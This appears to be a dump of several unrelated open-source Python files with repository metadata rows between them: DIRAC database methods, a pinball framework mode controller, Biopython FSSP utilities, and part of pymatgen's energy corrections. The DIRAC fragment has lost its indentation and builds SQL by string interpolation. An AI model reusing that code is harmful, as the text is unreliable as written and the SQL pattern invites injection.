if not res['OK']:
return res
_fileIDs, lfnFileIDs = res['Value']
for lfn in lfns:
if not lfn in lfnFileIDs.keys():
req = "INSERT INTO DataFiles (LFN,Status) VALUES ('%s','New');" % lfn
res = self._update( req, connection )
if not res['OK']:
return res
lfnFileIDs[lfn] = res['lastRowId']
return S_OK( lfnFileIDs )
def __setDataFileStatus( self, fileIDs, status, connection = False ):
""" Set the status of the supplied files
"""
req = "UPDATE DataFiles SET Status = '%s' WHERE FileID IN (%s);" % ( status, intListToString( fileIDs ) )
return self._update( req, connection )
###########################################################################
#
# These methods manipulate multiple tables
#
def addTaskForTransformation( self, transID, lfns = [], se = 'Unknown', connection = False ):
""" Create a new task with the supplied files for a transformation.
"""
res = self._getConnectionTransID( connection, transID )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
# Be sure the all the supplied LFNs are known to the database for the supplied transformation
fileIDs = []
if lfns:
res = self.getTransformationFiles( condDict = {'TransformationID':transID, 'LFN':lfns}, connection = connection )
if not res['OK']:
return res
foundLfns = set()
for fileDict in res['Value']:
fileIDs.append( fileDict['FileID'] )
lfn = fileDict['LFN']
if fileDict['Status'] in self.allowedStatusForTasks:
foundLfns.add( lfn )
else:
gLogger.error( "Supplied file not in %s status but %s" % ( self.allowedStatusForTasks, fileDict['Status'] ), lfn )
unavailableLfns = set( lfns ) - foundLfns
if unavailableLfns:
gLogger.error( "Supplied files not found for transformation", sorted( unavailableLfns ) )
return S_ERROR( "Not all supplied files available in the transformation database" )
# Insert the task into the jobs table and retrieve the taskID
self.lock.acquire()
req = "INSERT INTO TransformationTasks(TransformationID, ExternalStatus, ExternalID, TargetSE,"
req = req + " CreationTime, LastUpdateTime)"
req = req + " VALUES (%s,'%s','%d','%s', UTC_TIMESTAMP(), UTC_TIMESTAMP());" % ( transID, 'Created', 0, se )
res = self._update( req, connection )
if not res['OK']:
self.lock.release()
gLogger.error( "Failed to publish task for transformation", res['Message'] )
return res
# With InnoDB, TaskID is computed by a trigger, which sets the local variable @last (per connection)
# @last is the last insert TaskID. With multi-row inserts, will be the first new TaskID inserted.
# The trigger TaskID_Generator must be present with the InnoDB schema (defined in TransformationDB.sql)
if self.isTransformationTasksInnoDB:
res = self._query( "SELECT @last;", connection )
else:
res = self._query( "SELECT LAST_INSERT_ID();", connection )
self.lock.release()
if not res['OK']:
return res
taskID = int( res['Value'][0][0] )
gLogger.verbose( "Published task %d for transformation %d." % ( taskID, transID ) )
# If we have input data then update their status, and taskID in the transformation table
if lfns:
res = self.__insertTaskInputs( transID, taskID, lfns, connection = connection )
if not res['OK']:
self.__removeTransformationTask( transID, taskID, connection = connection )
return res
res = self.__assignTransformationFile( transID, taskID, se, fileIDs, connection = connection )
if not res['OK']:
self.__removeTransformationTask( transID, taskID, connection = connection )
return res
return S_OK( taskID )
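  # Minimal usage sketch (instance name, LFNs and SE below are hypothetical):
  #   res = transDB.addTaskForTransformation( transID, lfns = ['/lhcb/data/run1/file_1.dst'],
  #                                           se = 'CERN-DST' )
  #   if res['OK']: taskID = res['Value']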
def extendTransformation( self, transName, nTasks, author = '', connection = False ):
""" Extend SIMULATION type transformation by nTasks number of tasks
"""
connection = self.__getConnection( connection )
res = self.getTransformation( transName, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get transformation details", res['Message'] )
return res
transType = res['Value']['Type']
transID = res['Value']['TransformationID']
extendableProds = Operations().getValue( 'Transformations/ExtendableTransfTypes', ['Simulation', 'MCSimulation'] )
if transType.lower() not in [ep.lower() for ep in extendableProds]:
return S_ERROR( 'Can not extend non-SIMULATION type production' )
taskIDs = []
for _task in range( nTasks ):
res = self.addTaskForTransformation( transID, connection = connection )
if not res['OK']:
return res
taskIDs.append( res['Value'] )
# Add information to the transformation logging
message = 'Transformation extended by %d tasks' % nTasks
self.__updateTransformationLogging( transName, message, author, connection = connection )
return S_OK( taskIDs )
def cleanTransformation( self, transName, author = '', connection = False ):
""" Clean the transformation specified by name or id """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__deleteTransformationFileTasks( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationFiles( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationTaskInputs( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationTasks( transID, connection = connection )
if not res['OK']:
return res
self.__updateTransformationLogging( transID, "Transformation Cleaned", author, connection = connection )
return S_OK( transID )
def deleteTransformation( self, transName, author = '', connection = False ):
""" Remove the transformation specified by name or id """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.cleanTransformation( transID, author = author, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationLog( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationParameters( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformation( transID, connection = connection )
if not res['OK']:
return res
res = self.__updateFilters()
if not res['OK']:
return res
return S_OK()
def __removeTransformationTask( self, transID, taskID, connection = False ):
res = self.__deleteTransformationTaskInputs( transID, taskID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationFileTask( transID, taskID, connection = connection )
if not res['OK']:
return res
res = self.__resetTransformationFile( transID, taskID, connection = connection )
if not res['OK']:
return res
return self.__deleteTransformationTask( transID, taskID, connection = connection )
def __checkUpdate( self, table, param, paramValue, selectDict = {}, connection = False ):
""" Check whether the update will perform an update """
req = "UPDATE %s SET %s = '%s'" % ( table, param, paramValue )
if selectDict:
req = "%s %s" % ( req, self.buildCondition( selectDict ) )
return self._update( req, connection )
def __getConnection( self, connection ):
if connection:
return connection
res = self._getConnection()
if res['OK']:
return res['Value']
gLogger.warn( "Failed to get MySQL connection", res['Message'] )
return connection
def _getConnectionTransID( self, connection, transName ):
connection = self.__getConnection( connection )
res = self._getTransformationID( transName, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get ID for transformation", res['Message'] )
return res
transID = res['Value']
resDict = {'Connection':connection, 'TransformationID':transID}
return S_OK( resDict )
####################################################################################
#
# This part should correspond to the DIRAC Standard File Catalog interface
#
####################################################################################
def exists( self, lfns, connection = False ):
""" Check the presence of the lfn in the TransformationDB DataFiles table
"""
gLogger.info( "TransformationDB.exists: Attempting to determine existence of %s files." % len( lfns ) )
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
fileIDs, _lfnFilesIDs = res['Value']
failed = {}
successful = {}
fileIDsValues = set( fileIDs.values() )
for lfn in lfns:
if not lfn in fileIDsValues:
successful[lfn] = False
else:
successful[lfn] = True
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def addFile( self, fileDicts, force = False, connection = False ):
""" Add a new file to the TransformationDB together with its first replica.
In the input dict, the only mandatory info are PFN and SE
"""
gLogger.info( "TransformationDB.addFile: Attempting to add %s files." % len( fileDicts.keys() ) )
successful = {}
failed = {}
# Determine which files pass the filters and are to be added to transformations
transFiles = {}
filesToAdd = []
for lfn in fileDicts.keys():
fileTrans = self.__filterFile( lfn )
if not ( fileTrans or force ):
successful[lfn] = True
else:
filesToAdd.append( lfn )
for trans in fileTrans:
if not transFiles.has_key( trans ):
transFiles[trans] = []
transFiles[trans].append( lfn )
# Add the files to the DataFiles and Replicas tables
if filesToAdd:
connection = self.__getConnection( connection )
res = self.__addDataFiles( filesToAdd, connection = connection )
if not res['OK']:
return res
lfnFileIDs = res['Value']
for lfn in filesToAdd:
if lfnFileIDs.has_key( lfn ):
successful[lfn] = True
else:
failed[lfn] = True
# Add the files to the transformations
# TODO: THIS SHOULD BE TESTED WITH A TRANSFORMATION WITH A FILTER
for transID, lfns in transFiles.items():
fileIDs = []
for lfn in lfns:
if lfnFileIDs.has_key( lfn ):
fileIDs.append( lfnFileIDs[lfn] )
if fileIDs:
res = self.__addFilesToTransformation( transID, fileIDs, connection = connection )
if not res['OK']:
gLogger.error( "Failed to add files to transformation", "%s %s" % ( transID, res['Message'] ) )
failed[lfn] = True
successful[lfn] = False
else:
successful[lfn] = True
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def removeFile( self, lfns, connection = False ):
""" Remove file specified by lfn from the ProcessingDB
"""
gLogger.info( "TransformationDB.removeFile: Attempting to remove %s files." % len( lfns ) )
failed = {}
successful = {}
connection = self.__getConnection( connection )
if not lfns:
return S_ERROR( "No LFNs supplied" )
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
fileIDs, lfnFilesIDs = res['Value']
for lfn in lfns:
if not lfnFilesIDs.has_key( lfn ):
successful[lfn] = 'File did not exist'
if fileIDs:
res = self.__setTransformationFileStatus( fileIDs.keys(), 'Deleted', connection = connection )
if not res['OK']:
return res
res = self.__setDataFileStatus( fileIDs.keys(), 'Deleted', connection = connection )
if not res['OK']:
return S_ERROR( "TransformationDB.removeFile: Failed to remove files." )
for lfn in lfnFilesIDs.keys():
if not failed.has_key( lfn ):
successful[lfn] = True
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def addDirectory( self, path, force = False ):
""" Adds all the files stored in a given directory in file catalog """
gLogger.info( "TransformationDB.addDirectory: Attempting to populate %s." % path )
res = pythonCall( 30, self.__addDirectory, path, force )
if not res['OK']:
gLogger.error( "Failed to invoke addDirectory with shifter proxy" )
return res
return res['Value']
def __addDirectory( self, path, force ):
res = setupShifterProxyInEnv( "ProductionManager" )
if not res['OK']:
return S_OK( "Failed to setup shifter proxy" )
catalog = FileCatalog()
start = time.time()
res = catalog.listDirectory( path )
if not res['OK']:
gLogger.error( "TransformationDB.addDirectory: Failed to get files. %s" % res['Message'] )
return res
if not path in res['Value']['Successful']:
gLogger.error( "TransformationDB.addDirectory: Failed to get files." )
return res
gLogger.info( "TransformationDB.addDirectory: Obtained %s files in %s seconds." % ( path, time.time() - start ) )
successful = []
failed = []
for lfn in res['Value']['Successful'][path]["Files"].keys():
res = self.addFile( {lfn:{}}, force = force )
if not res['OK']:
failed.append( lfn )
continue
if not lfn in res['Value']['Successful']:
failed.append( lfn )
else:
successful.append( lfn )
return {"OK":True, "Value": len( res['Value']['Successful'] ), "Successful":successful, "Failed": failed }
|
calancha/DIRAC
|
TransformationSystem/DB/TransformationDB.py
|
Python
|
gpl-3.0
| 68,155
|
[
"DIRAC"
] |
f41f5bca60c1fd90a2f24dfe447b4ff90a04dc0d7e5a0705a21ec9f281160a3b
|
""" """
# mode_controller.py
# Mission Pinball Framework
# Written by Brian Madden & Gabe Knuth
# Released under the MIT License. (See license info at the end of this file.)
# Documentation and more info at http://missionpinball.com/mpf
import logging
import os
from collections import namedtuple
from mpf.system.utility_functions import Util
from mpf.system.config import Config
from mpf.media_controller.core.mode import Mode
RemoteMethod = namedtuple('RemoteMethod', 'method config_section kwargs priority',
verbose=False)
"""RemotedMethod is used by other modules that want to register a method to
be called on mode_start or mode_stop.
"""
class ModeController(object):
"""Parent class for the Mode Controller. There is one instance of this in
MPF and it's responsible for loading, unloading, and managing all game
modes.
"""
def __init__(self, machine):
self.machine = machine
self.log = logging.getLogger('ModeController')
self.active_modes = list()
self.mode_stop_count = 0
# The following two lists hold namedtuples of any remote components that
# need to be notified when a mode object is created and/or started.
self.loader_methods = list()
self.start_methods = list()
if 'modes' in self.machine.config:
self.machine.events.add_handler('init_phase_4',
self._load_modes)
def _load_modes(self):
        # Loads the modes from the Modes: section of the machine configuration
        # file.
for mode in set(self.machine.config['modes']):
self.machine.modes[mode] = self._load_mode(mode)
def _load_mode(self, mode_string):
"""Loads a mode, reads in its config, and creates the Mode object.
Args:
            mode_string: String name of the mode you're loading. This is the name of
the mode's folder in your game's machine_files/modes folder.
"""
self.log.debug('Processing mode: %s', mode_string)
config = dict()
# find the folder for this mode:
mode_path = os.path.join(self.machine.machine_path,
self.machine.config['media_controller']['paths']['modes'], mode_string)
if not os.path.exists(mode_path):
mode_path = os.path.abspath(os.path.join('mpf', self.machine.config['media_controller']['paths']['modes'], mode_string))
# Is there an MPF default config for this mode? If so, load it first
mpf_mode_config = os.path.join(
'mpf',
self.machine.config['media_controller']['paths']['modes'],
mode_string,
'config',
mode_string + '.yaml')
if os.path.isfile(mpf_mode_config):
config = Config.load_config_file(mpf_mode_config)
# Now figure out if there's a machine-specific config for this mode, and
# if so, merge it into the config
mode_config_folder = os.path.join(self.machine.machine_path,
self.machine.config['media_controller']['paths']['modes'], mode_string, 'config')
found_file = False
for path, _, files in os.walk(mode_config_folder):
for file in files:
file_root, file_ext = os.path.splitext(file)
if file_root == mode_string:
config = Util.dict_merge(config,
Config.load_config_file(os.path.join(path, file)))
found_file = True
break
if found_file:
break
return Mode(self.machine, config, mode_string, mode_path)
def register_load_method(self, load_method, config_section_name=None,
priority=0, **kwargs):
"""Used by system components, plugins, etc. to register themselves with
the Mode Controller for anything they need a mode to do when it's
registered.
Args:
load_method: The method that will be called when this mode code
loads.
config_section_name: An optional string for the section of the
configuration file that will be passed to the load_method when
it's called.
priority: Int of the relative priority which allows remote methods
to be called in a specific order. Default is 0. Higher values
will be called first.
**kwargs: Any additional keyword arguments specified will be passed
to the load_method.
Note that these methods will be called once, when the mode code is first
initialized during the MPF boot process.
"""
self.loader_methods.append(RemoteMethod(method=load_method,
config_section=config_section_name, kwargs=kwargs,
priority=priority))
self.loader_methods.sort(key=lambda x: x.priority, reverse=True)
def register_start_method(self, start_method, config_section_name=None,
priority=0, **kwargs):
"""Used by system components, plugins, etc. to register themselves with
        the Mode Controller for anything they need a mode to do when it starts.
Args:
start_method: The method that will be called when this mode code
loads.
config_section_name: An optional string for the section of the
configuration file that will be passed to the start_method when
it's called.
priority: Int of the relative priority which allows remote methods
to be called in a specific order. Default is 0. Higher values
will be called first.
**kwargs: Any additional keyword arguments specified will be passed
to the start_method.
Note that these methods will be called every single time this mode is
started.
"""
self.start_methods.append(RemoteMethod(method=start_method,
config_section=config_section_name, priority=priority,
kwargs=kwargs))
self.start_methods.sort(key=lambda x: x.priority, reverse=True)
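    # Illustrative sketch (hypothetical plugin code, not part of this module;
    # it assumes the ModeController instance is reachable as
    # machine.mode_controller, which may differ in a given setup):
    #   self.machine.mode_controller.register_load_method(
    #       self.configure_shows, config_section_name='my_shows')
    #   self.machine.mode_controller.register_start_method(
    #       self.enable_shows, config_section_name='my_shows', priority=100)
    # The registered callables are invoked with the named config section of the
    # mode (if any) plus the extra kwargs supplied at registration time.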
def _active_change(self, mode, active):
# called when a mode goes active or inactive
if active:
self.active_modes.append(mode)
else:
self.active_modes.remove(mode)
# sort the active mode list by priority
self.active_modes.sort(key=lambda x: x.priority, reverse=True)
self.dump()
def dump(self):
"""Dumps the current status of the running modes to the log file."""
self.log.info('================ ACTIVE GAME MODES ===================')
for mode in self.active_modes:
if mode.active:
self.log.info('%s : %s', mode.name, mode.priority)
self.log.info('======================================================')
# The MIT License (MIT)
# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
|
spierepf/mpf
|
mpf/media_controller/core/mode_controller.py
|
Python
|
mit
| 8,091
|
[
"Brian"
] |
3fc93f167df4db270b5553103b582a8589d368700c35b93da541896dd9a0cc4c
|
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
import sys
# Add path to Bio
sys.path.append('../..')
from Bio import FSSP
import copy
from Bio.Align import MultipleSeqAlignment
from Bio import Alphabet
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
class FSSPAlign(MultipleSeqAlignment):
def _add_numbering_table(self, new_record):
new_record.annotations['abs2pdb'] = {}
new_record.annotations['pdb2abs'] = {}
class FSSPMultAlign(dict):
def __init__(self):
self.abs_res = []
self.pdb_res = []
self.data = {}
def mult_align(sum_dict, align_dict):
"""Returns a biopython multiple alignment instance (MultipleSeqAlignment)"""
mult_align_dict = {}
for j in align_dict.abs(1).pos_align_dict:
mult_align_dict[j] = ''
for i in range(1, len(align_dict)+1):
# loop on positions
for j in align_dict.abs(i).pos_align_dict:
# loop within a position
mult_align_dict[j] += align_dict.abs(i).pos_align_dict[j].aa
alpha = Alphabet.Gapped(Alphabet.IUPAC.extended_protein)
fssp_align = MultipleSeqAlignment([], alphabet=alpha)
for i in sorted(mult_align_dict):
fssp_align.append(SeqRecord(Seq(mult_align_dict[i], alpha),
sum_dict[i].pdb2+sum_dict[i].chain2))
return fssp_align
# Several routines used to extract information from FSSP sections
# filter:
# filters a passed summary section and alignment section according to a numeric
# attribute in the summary section. Returns new summary and alignment sections
# For example, to filter in only those records which have a zscore greater than
# 4.0 and lesser than 7.5:
# new_sum, new_align = filter(sum, align, 'zscore', 4, 7.5)
#
# Warning: this function really slows down when filtering large FSSP files.
# The reason is the use of copy.deepcopy() to copy align_dict into
# new_align_dict. I have to figure out something better.
# Took me ~160 seconds for the largest FSSP file (1reqA.fssp)
#
def filter(sum_dict, align_dict, filter_attribute, low_bound, high_bound):
"""Filters a passed summary section and alignment section according to a numeric
attribute in the summary section. Returns new summary and alignment sections"""
new_sum_dict = FSSP.FSSPSumDict()
new_align_dict = copy.deepcopy(align_dict)
# for i in align_dict:
# new_align_dict[i] = copy.copy(align_dict[i])
# new_align_dict = copy.copy(align_dict)
for prot_num in sum_dict:
attr_value = getattr(sum_dict[prot_num], filter_attribute)
        if low_bound <= attr_value <= high_bound:
new_sum_dict[prot_num] = sum_dict[prot_num]
prot_numbers = sorted(new_sum_dict)
for pos_num in new_align_dict.abs_res_dict:
new_align_dict.abs(pos_num).pos_align_dict = {}
for prot_num in prot_numbers:
new_align_dict.abs(pos_num).pos_align_dict[prot_num] = \
align_dict.abs(pos_num).pos_align_dict[prot_num]
return new_sum_dict, new_align_dict
def name_filter(sum_dict, align_dict, name_list):
"""Accepts a list of names. Returns a new Summary block and Alignment block which
contain the info only for those names passed."""
new_sum_dict = FSSP.FSSPSumDict()
new_align_dict = copy.deepcopy(align_dict)
for cur_pdb_name in name_list:
for prot_num in sum_dict:
if sum_dict[prot_num].pdb2+sum_dict[prot_num].chain2 == cur_pdb_name:
new_sum_dict[prot_num] = sum_dict[prot_num]
prot_numbers = sorted(new_sum_dict)
for pos_num in new_align_dict.abs_res_dict:
new_align_dict.abs(pos_num).pos_align_dict = {}
for prot_num in prot_numbers:
new_align_dict.abs(pos_num).pos_align_dict[prot_num] = \
align_dict.abs(pos_num).pos_align_dict[prot_num]
return new_sum_dict, new_align_dict
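# Illustrative usage sketch (the PDB chain identifiers are hypothetical; this
# assumes an FSSP file has already been parsed into sum_dict and align_dict
# with the Bio.FSSP parser):
#   new_sum, new_align = name_filter(sum_dict, align_dict, ['1xyzA', '2abcB'])
#   alignment = mult_align(new_sum, new_align)
#   print(alignment)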
|
Ambuj-UF/ConCat-1.0
|
src/Utils/Bio/FSSP/FSSPTools.py
|
Python
|
gpl-2.0
| 4,027
|
[
"Biopython"
] |
9a5a8007ccbaf1602ca1d599a2e5bfcc66b460817be5c76caa6032ff834f2e25
|
# proxy module
from __future__ import absolute_import
from mayavi.tools.data_wizards.preview_window import *
|
enthought/etsproxy
|
enthought/mayavi/tools/data_wizards/preview_window.py
|
Python
|
bsd-3-clause
| 109
|
[
"Mayavi"
] |
11872d10461109fcd98ae6edd0b3f7cfb43d4418226c11d203154e1b16b606a4
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module implements Compatibility corrections for mixing runs of different
functionals.
"""
import abc
import os
import warnings
from collections import defaultdict
from typing import List, Optional, Sequence, Type, Union
import numpy as np
from monty.design_patterns import cached_class
from monty.json import MSONable
from monty.serialization import loadfn
from tqdm import tqdm
from uncertainties import ufloat
from pymatgen.analysis.structure_analyzer import oxide_type, sulfide_type
from pymatgen.core.periodic_table import Element
from pymatgen.entries.computed_entries import (
CompositionEnergyAdjustment,
ComputedEntry,
ComputedStructureEntry,
ConstantEnergyAdjustment,
EnergyAdjustment,
TemperatureEnergyAdjustment,
)
from pymatgen.io.vasp.sets import MITRelaxSet, MPRelaxSet
__author__ = "Amanda Wang, Ryan Kingsbury, Shyue Ping Ong, Anubhav Jain, Stephen Dacek, Sai Jayaraman"
__copyright__ = "Copyright 2012-2020, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "April 2020"
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
MU_H2O = -2.4583 # Free energy of formation of water, eV/H2O, used by MaterialsProjectAqueousCompatibility
AnyCompEntry = Union[ComputedEntry, ComputedStructureEntry]
class CompatibilityError(Exception):
"""
Exception class for Compatibility. Raised by attempting correction
on incompatible calculation
"""
class Correction(metaclass=abc.ABCMeta):
"""
    A Correction class is a pre-defined scheme for correcting a computed
entry based on the type and chemistry of the structure and the
calculation parameters. All Correction classes must implement a
correct_entry method.
"""
@abc.abstractmethod
def get_correction(self, entry):
"""
Returns correction and uncertainty for a single entry.
Args:
entry: A ComputedEntry object.
Returns:
The energy correction to be applied and the uncertainty of the correction.
Raises:
CompatibilityError if entry is not compatible.
"""
return
def correct_entry(self, entry):
"""
Corrects a single entry.
Args:
entry: A ComputedEntry object.
Returns:
            A processed entry.
Raises:
CompatibilityError if entry is not compatible.
"""
new_corr = self.get_correction(entry)
old_std_dev = entry.correction_uncertainty
if np.isnan(old_std_dev):
old_std_dev = 0
old_corr = ufloat(entry.correction, old_std_dev)
updated_corr = new_corr + old_corr
if updated_corr.nominal_value != 0 and updated_corr.std_dev == 0:
# if there are no error values available for the corrections applied,
# set correction uncertainty to not a number
uncertainty = np.nan
else:
uncertainty = updated_corr.std_dev
entry.energy_adjustments.append(ConstantEnergyAdjustment(updated_corr.nominal_value, uncertainty))
return entry
class PotcarCorrection(Correction):
"""
Checks that POTCARs are valid within a pre-defined input set. This
ensures that calculations performed using different InputSets are not
compared against each other.
Entry.parameters must contain a "potcar_symbols" key that is a list of
all POTCARs used in the run. Again, using the example of an Fe2O3 run
using Materials Project parameters, this would look like
entry.parameters["potcar_symbols"] = ['PAW_PBE Fe_pv 06Sep2000',
'PAW_PBE O 08Apr2002'].
"""
def __init__(self, input_set, check_hash=False):
"""
Args:
input_set: InputSet object used to generate the runs (used to check
for correct potcar symbols)
check_hash (bool): If true, uses the potcar hash to check for valid
potcars. If false, uses the potcar symbol (Less reliable).
                Defaults to False
Raises:
            ValueError if the entry does not contain a "potcar_symbols" key.
            CompatibilityError if the potcar symbols are wrong.
"""
potcar_settings = input_set.CONFIG["POTCAR"]
if isinstance(list(potcar_settings.values())[-1], dict):
if check_hash:
self.valid_potcars = {k: d["hash"] for k, d in potcar_settings.items()}
else:
self.valid_potcars = {k: d["symbol"] for k, d in potcar_settings.items()}
else:
if check_hash:
raise ValueError("Cannot check hashes of potcars, since hashes are not included in the entry.")
self.valid_potcars = potcar_settings
self.input_set = input_set
self.check_hash = check_hash
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction, Uncertainty.
"""
if self.check_hash:
if entry.parameters.get("potcar_spec"):
psp_settings = {d.get("hash") for d in entry.parameters["potcar_spec"] if d}
else:
raise ValueError("Cannot check hash without potcar_spec field")
else:
if entry.parameters.get("potcar_spec"):
psp_settings = {d.get("titel").split()[1] for d in entry.parameters["potcar_spec"] if d}
else:
psp_settings = {sym.split()[1] for sym in entry.parameters["potcar_symbols"] if sym}
if {self.valid_potcars.get(str(el)) for el in entry.composition.elements} != psp_settings:
raise CompatibilityError("Incompatible potcar")
return ufloat(0.0, 0.0)
def __str__(self):
return f"{self.input_set.__name__} Potcar Correction"
@cached_class
class GasCorrection(Correction):
"""
Correct gas energies to obtain the right formation energies. Note that
this depends on calculations being run within the same input set.
Used by legacy MaterialsProjectCompatibility and MITCompatibility.
"""
def __init__(self, config_file):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
"""
c = loadfn(config_file)
self.name = c["Name"]
self.cpd_energies = c["Advanced"]["CompoundEnergies"]
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction.
"""
comp = entry.composition
correction = ufloat(0.0, 0.0)
# set error to 0 because old MPCompatibility doesn't have errors
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
rform = entry.composition.reduced_formula
if rform in self.cpd_energies:
correction += self.cpd_energies[rform] * comp.num_atoms - entry.uncorrected_energy
return correction
def __str__(self):
return f"{self.name} Gas Correction"
@cached_class
class AnionCorrection(Correction):
"""
Correct anion energies to obtain the right formation energies. Note that
this depends on calculations being run within the same input set.
Used by legacy MaterialsProjectCompatibility and MITCompatibility.
"""
def __init__(self, config_file, correct_peroxide=True):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
"""
c = loadfn(config_file)
self.oxide_correction = c["OxideCorrections"]
self.sulfide_correction = c.get("SulfideCorrections", defaultdict(float))
self.name = c["Name"]
self.correct_peroxide = correct_peroxide
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction.
"""
comp = entry.composition
if len(comp) == 1: # Skip element entry
return ufloat(0.0, 0.0)
correction = ufloat(0.0, 0.0)
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
# Check for sulfide corrections
if Element("S") in comp:
sf_type = "sulfide"
if entry.data.get("sulfide_type"):
sf_type = entry.data["sulfide_type"]
elif hasattr(entry, "structure"):
warnings.warn(sf_type)
sf_type = sulfide_type(entry.structure)
# use the same correction for polysulfides and sulfides
if sf_type == "polysulfide":
sf_type = "sulfide"
if sf_type in self.sulfide_correction:
correction += self.sulfide_correction[sf_type] * comp["S"]
# Check for oxide, peroxide, superoxide, and ozonide corrections.
if Element("O") in comp:
if self.correct_peroxide:
if entry.data.get("oxide_type"):
if entry.data["oxide_type"] in self.oxide_correction:
ox_corr = self.oxide_correction[entry.data["oxide_type"]]
correction += ox_corr * comp["O"]
if entry.data["oxide_type"] == "hydroxide":
ox_corr = self.oxide_correction["oxide"]
correction += ox_corr * comp["O"]
elif hasattr(entry, "structure"):
ox_type, nbonds = oxide_type(entry.structure, 1.05, return_nbonds=True)
if ox_type in self.oxide_correction:
correction += self.oxide_correction[ox_type] * nbonds
elif ox_type == "hydroxide":
correction += self.oxide_correction["oxide"] * comp["O"]
else:
warnings.warn(
"No structure or oxide_type parameter present. Note "
"that peroxide/superoxide corrections are not as "
"reliable and relies only on detection of special"
"formulas, e.g., Li2O2."
)
rform = entry.composition.reduced_formula
if rform in UCorrection.common_peroxides:
correction += self.oxide_correction["peroxide"] * comp["O"]
elif rform in UCorrection.common_superoxides:
correction += self.oxide_correction["superoxide"] * comp["O"]
elif rform in UCorrection.ozonides:
correction += self.oxide_correction["ozonide"] * comp["O"]
elif Element("O") in comp.elements and len(comp.elements) > 1:
correction += self.oxide_correction["oxide"] * comp["O"]
else:
correction += self.oxide_correction["oxide"] * comp["O"]
return correction
def __str__(self):
return f"{self.name} Anion Correction"
@cached_class
class AqueousCorrection(Correction):
"""
This class implements aqueous phase compound corrections for elements
and H2O.
Used only by MITAqueousCompatibility.
"""
def __init__(self, config_file, error_file=None):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
error_file: Path to the selected compatibilityErrors.yaml config file.
"""
c = loadfn(config_file)
self.cpd_energies = c["AqueousCompoundEnergies"]
# there will either be a CompositionCorrections OR an OxideCorrections key,
# but not both, depending on the compatibility scheme we are using.
# MITCompatibility only uses OxideCorrections, and hence self.comp_correction is none.
self.comp_correction = c.get("CompositionCorrections", defaultdict(float))
self.oxide_correction = c.get("OxideCorrections", defaultdict(float))
self.name = c["Name"]
if error_file:
e = loadfn(error_file)
self.cpd_errors = e.get("AqueousCompoundEnergies", defaultdict(float))
else:
self.cpd_errors = defaultdict(float)
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction, Uncertainty.
"""
from pymatgen.analysis.pourbaix_diagram import MU_H2O
comp = entry.composition
rform = comp.reduced_formula
cpdenergies = self.cpd_energies
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
correction = ufloat(0.0, 0.0)
if rform in cpdenergies:
if rform in ["H2", "H2O"]:
corr = cpdenergies[rform] * comp.num_atoms - entry.uncorrected_energy - entry.correction
err = self.cpd_errors[rform] * comp.num_atoms
correction += ufloat(corr, err)
else:
corr = cpdenergies[rform] * comp.num_atoms
err = self.cpd_errors[rform] * comp.num_atoms
correction += ufloat(corr, err)
if not rform == "H2O":
